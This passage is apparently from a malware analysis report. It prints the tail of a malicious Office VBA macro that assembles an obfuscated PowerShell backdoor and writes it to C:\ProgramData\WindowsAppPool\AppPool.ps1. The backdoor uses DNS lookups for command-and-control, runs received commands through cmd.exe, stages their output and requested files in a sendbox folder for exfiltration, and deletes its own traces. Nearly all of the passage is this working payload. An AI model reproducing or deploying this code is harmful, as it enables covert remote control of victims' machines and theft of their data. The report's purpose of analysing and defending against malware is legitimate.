sss = sss + "SGFSSE = SGFJJE.Substring(SGFKKE * (SGFLLD + SGFOOE), (SGFJJE.Length - SGFKKE * (SGFLLD + SGFOOE)));" & vbCrLf & " }" & vbCrLf & " els'+'e" & vbCrLf & " {" & vbCrLf & " SGFSSE = X9PCOCTabCOCTX9P;" & vbCrLf & " SGF'+'{global:SGFRRD} = SGFfalse;" & vbCrLf & "'+' '+' rd -path SGFIIE -Force;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " else" & vbCrLf & " {" & vbCrLf & " SGFSSE = SGFJJE;" & vbCrLf & " '+' }" & vbCrLf & " SGFTTE = (Split-path SGFIIE '+'-Leaf) + X9P*X9P 7rn % { resolver SGF_ };" & vbCrLf & " SGFUUD = UUC SGFNNE SGFQQD SGFSSE SGFTTE X9PsX9P X9P0000X9P" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " if (SG'+'FEEE -lt 3 -and -not (SGFUUE))" & vbCrLf & " {" & vbCrLf & " '+' '+' SGFVVD = IID('+'SG'+'FUUD);" & vbCrLf & " }" & vbCrLf & " '+'else" & vbCrLf & " {" & vbCrLf & " SGFVVD = [System.Net.Dns]::GetHostAddresses(SGFUUD);" & vbCrLf & " SGFVVD = SGFVVD.I'+'PAddr'+'essToString.Split(ZxV.ZxV)" & vbCrLf & " }" & vbCrLf & " Write-Host SGFVVD;" & vbCrLf
sss = sss + " }'+'" & vbCrLf & " catch [exception] { Wr'+'ite-Host X9Pexcepton occured!X9P+SGF_; SGF{global:SGFSSD}++; continue; }" & vbCrLf & " " & vbCrLf & " if (SG'+'FVVD -eq SGFnull) { SGFQQE = SGFfalse; SGF{globa'+'l:SGFSSD}++; continue }" & vbCrLf & " '+'if ((SGFVVD[0] -eq SGFRRC.Substring(0,2)) -and (SGFVVD[1] '+'-eq 2) -and (SGFVVD[2] -eq 3))" & vbCrLf & " {" & vbCrLf & " SGFQQE = SGFfalse;'+'" & vbCrLf & " SGFLLD = [int]SGFVVD[3];" & vbCrLf & " }" & vbCrLf & "'+'" & vbCrLf & " " & vbCrLf & " if ((SGFVVD[0] -eq '+'253) -and (SGFVVD[1] -eq 25) -and (SGFVVD[2] -eq 42) -and (SGFVVD[3] -eq 87)) # kill this process" & vbCrLf & " {" & vbCrLf & " SGFQQE = SGFfalse;" & vbCrLf & " SGFOOE = 0" & vbCrLf & " SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & " SGF{global:SGFSSD} = SGF{global:SGFSSD} + 3;" & vbCrLf & " del SGFIIE;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if (SGFQQE)" & vbCrLf & " {" & vbCrLf & "'+'" & vbCrLf & " SGF{global:SGFSSD}++;" & vbCrLf
sss = sss + " }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function slab'+'er (SGFVVE) {" & vbCrLf & " SGFf = gc SGFVVE -Encoding Byte;" & vbCrLf & " SGFe = resolver(SGFf);" & vbCrLf & " retur'+'n SGFe;" & vbCrLf & "}" & vbCrLf & "function resolver (SGFWWE) {" & vbCrLf & " SGFcnt = 0;" & vbCrLf & " SGFp1 = X9PX9P;" & vbCrLf & " SGFp2'+' = X9PX9P;" & vbCrLf & " for (SGFi = 0; SGFi -lt SGFWWE.Length; SGFi++)" & vbCrLf & " {" & vbCrLf & " if (SGFcnt -eq 30)" & vbCrLf & " {" & vbCrLf & " SGFcnt = 0;" & vbCrLf & " SGFres += (SGFp1 + SGFp2);" & vbCrLf & " SGF'+'p1 = X9PX9P; SGFp2 = X9PX9P;" & vbCrLf & " }" & vbCrLf & " SGFtmp = [System.BitConverter]::ToString(SGFWWE[SGFi]).Replace(X9P-X9P, X9PX9P);" & vbCrLf & " SGFp1 += SG'+'Ftmp[0];" & vbCrLf & " SGFp2 += SGFtmp[1];" & vbCrLf & " SGFcnt++;" & vbCrLf & " }" & vbCrLf & " SGFres +='+' (SGFp1 + SGFp2);" & vbCrLf & " return SGFres;" & vbCrLf & "}" & vbCrLf & "function XXE" & vbCrLf & "{" & vbCrLf
sss = sss + " SGFFFE = @(gci -path (SGF{global:SGFNND}+X9PMxarcvd'+'*X9P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & " if (SGFFFE -ne SGFnull)" & vbCrLf & " {" & vbCrLf & " S'+'GFIIE = SG'+'FFFE[0].ToStri'+'ng()'+'.Replace(X9PrcvdX9P, X9PprocX9P)" & vbCrLf & " rni SGFFFE[0] SGFIIE -Force" & vbCrLf & " '+' SGFYYE = SGFIIE'+' -replace X9PreceiveboxX9P, X9PsendboxX9P;" & vbCrLf & " i'+'f (SGFIIE.EndsWith(X9P0X9P))" & vbCrLf & " {" & vbCrLf & " SGFZZE = gc SGFIIE 7rn'+' ? { SGF_.t'+'rim() -ne X9PX9P };'+'" & vbCrLf & " S'+'GFZZE = SGFZZE 7rn ? { SGF_.trim() -ne X9PX9P }" & vbCrLf & " SGFAAF += (SGFZZE + X9P 2>&1X9P) 7rn % {Try { SGF_ 7rn cmd.exe 7rn Out-String }Catch { SGF_ 7rn Out-Strin'+'g '+'}}" & vbCrLf & " SGFAAF +X9P<>X9P 7rn sc SGFYYE -Encoding UTF8" & vbCrLf & " if (Te'+'st-path -path SGFIIE)" & vbCrLf & " {" & vbCrLf & " rd -path SG'+'FIIE;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " elseif (SGF'+'IIE.EndsWith(X9P1X9P))" & vbCrLf & " {" & vbCrLf
sss = sss + " SGFBBF = gc SGFIIE 7rn ? { SGF_.'+'trim() -ne X9PX9P } 7rn %{ SGF_.Replace(X9PVOl0X9P, X9PX9P).Trim() }" & vbCrLf & " if (Test-path -path SGFBBF)" & vbCrLf & " {" & vbCrLf & " cpi -path SGFBBF -destination SGFYYE -Force;" & vbCrLf & " }" & vbCrLf & " else" & vbCrLf & " {" & vbCrLf & " X9PFile not existX9P 7rn sc SGFYYE;" & vbCrLf & " }" & vbCrLf & " if (Test-path -path SGFIIE)" & vbCrLf & " {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }" & vbCrLf & "'+'" & vbCrLf & " }" & vbCrLf & " '+'else {" & vbCrLf & " SGFCCF = SGFIIE -replac'+'e'+' X9PreceiveboxX9P, X9PdoneX9P;" & vbCrLf & " mi -path SGFIIE -destination SGFCCF'+' -Force;" & vbCrLf & " if (Test-path -path SGFCCF)" & vbCrLf & " {" & vbCrLf & " (X9P200'+'<>X9P + SGFCCF) 7rn sc SGFYYE;" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }cat'+'ch{}" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf
sss = sss + "SGF{global'+':SGFDDF} = SGFNNC + X9PMxaX9P + SGFRRC;" & vbCrLf & "SGF{global:SGFEEF} = SGFN'+'NC + X9PMxafilesX9P;" & vbCrLf & "SGF{glo'+'b'+'al:SGFNND} = '+'SGF{global:S'+'GFDDF} + X9PMxareceiveboxX9P;" & vbCrLf & "S'+'GF{global:SGFGGE} = SGF{global:SGFDDF} + X9PMxasendboxX9P;" & vbCrLf & "SGF{global:SGFFFF} = SGF{global:SGFDDF} + X9PMxadoneX9P;" & vbCrLf & "'+'" & vbCrLf & "if (-not (Test-Path SGF{global:SGF'+'EEF})) { md SGF{global:SGFEEF}; }" & vbCrLf & "if (-no'+'t (Test-Path SGF{global:SGFDDF}) -or -not (Test-Path SGF{global:SGFGGE}))" & vbCrLf & "{" & vbCrLf & " md SGF{global:SGFDDF};" & vbCrLf & " md SGF{global:SGF'+'GGE};" & vbCrLf & " m'+'d SGF{global:SGFNND};" & vbCrLf & " md SGF{global:SGFFFF};" & vbCrLf & "}" & vbCrLf & "SGFGGF = UU'+'C X9P000X9P X9PMX9P X9PX9P X9PX9P X9PrX9P SGFrn" & vbCrLf & "SGFHHF = [System.Net.Dns]::GetHostAddresses(SGFGGF);" & vbCrLf & "SGFUUE = SGFfalse;" & vbCrLf & "if (SGFHHF -eq X9P99.250.250.1'+'99X9P)" & vbCrLf & "{" & vbCrLf
sss = sss + " SGF{global:SGFTTC} = 0;" & vbCrLf & " YYD;" & vbCrLf & " if (SGF{global:SG'+'FTTC} -gt 3)" & vbCrLf & " {" & vbCrLf & " SGFUUE = SGFtrue;" & vbCrLf & "'+'" & vbCrLf & " SGFIIF = UUC X9P000X'+'9P X9PPX9P X9PX'+'9P X9PX9P X9PrX9P SGFrn" & vbCrLf & " ['+'System.Net.Dns]::GetHostAddresses(SGFIIF);" & vbCrLf & " JJD;" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "else" & vbCrLf & "{" & vbCrLf & " SGFUUE = SG'+'Ftrue;" & vbCrLf & " JJD;" & vbCrLf & "}" & vbCrLf & "XXE;" & vbCrLf & "DDE(SGF{global:'+'SGFTTC});" & vbCrLf & "# remove lock'+' file to next request" & vbCrLf & "ri -Path SGFPPC;') -CrEPLaCe'Mxa',[chAR]92 -REplace ([chAR]83+[chAR]71+[chAR]70),[chAR]36 -REplace 'X9P',[chAR]34-CrEPLaCe ([chAR]55+[chAR]114+[chAR]110),[chAR]124 -REplace'ZxV',[chAR]39 -REplace'VOl',[chAR]96) | &( $ShelliD[1]+$sHeLLId[13]+'X')"
Open "C:\ProgramData\WindowsAppPool\AppPool.ps1" For Output As #1
Print #1, sss
Close #1
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.